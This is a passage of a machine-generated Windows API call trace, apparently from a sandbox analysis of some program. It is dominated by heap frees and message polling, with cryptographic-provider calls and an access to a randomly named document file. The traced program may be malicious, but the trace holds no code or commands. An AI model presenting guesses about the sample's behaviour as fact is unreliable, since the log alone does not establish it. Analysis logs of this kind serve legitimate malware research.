lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0130.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0130.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0130.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0130.615] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0130.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0130.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0130.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0130.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0130.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0130.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0130.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0130.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0130.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0130.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0130.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0130.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0130.616] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.616] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0130.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0130.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0130.617] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0130.617] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0130.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0130.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0130.617] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0130.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0130.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0130.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0130.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0130.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0130.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0130.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0130.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0130.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0130.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0130.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0130.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0130.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0130.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0130.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0130.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0130.617] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0130.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0130.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0130.618] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0130.618] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0130.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923e8 | out: hHeap=0x1780000) returned 1 [0130.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0130.618] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0130.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0130.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0130.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0130.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0130.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0130.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0130.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0130.618] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0130.618] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923e8 | out: hHeap=0x1780000) returned 1 [0130.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0130.618] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0130.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0130.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0130.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0130.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0130.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0130.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0130.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0130.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0130.619] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0130.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0130.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0130.619] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0130.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0130.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0130.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0130.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0130.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0130.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0130.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0130.619] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0130.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0130.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0130.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0130.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0130.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0130.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0130.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0130.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0130.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0130.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0130.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0130.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0130.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797028, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0130.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0130.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0130.620] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0130.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0130.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0130.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0130.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0130.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0130.620] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0130.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0130.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0130.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0130.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0130.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0130.621] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0130.622] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392148 | out: hHeap=0x1780000) returned 1 [0130.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0130.622] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0130.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0130.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0130.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0130.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0130.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0130.622] FreeLibrary (hLibModule=0x756e0000) returned 1 [0130.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0130.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0130.622] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0130.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0130.622] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0130.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0130.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0130.622] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0130.724] CloseHandle (hObject=0x258) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eba98 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0130.724] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0130.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0130.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0130.725] CloseHandle (hObject=0x2a0) returned 1 [0130.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0130.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0130.905] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.905] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0130.905] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\b029yG4LTNtgmmqX_G.odp", nBufferLength=0x7fff, 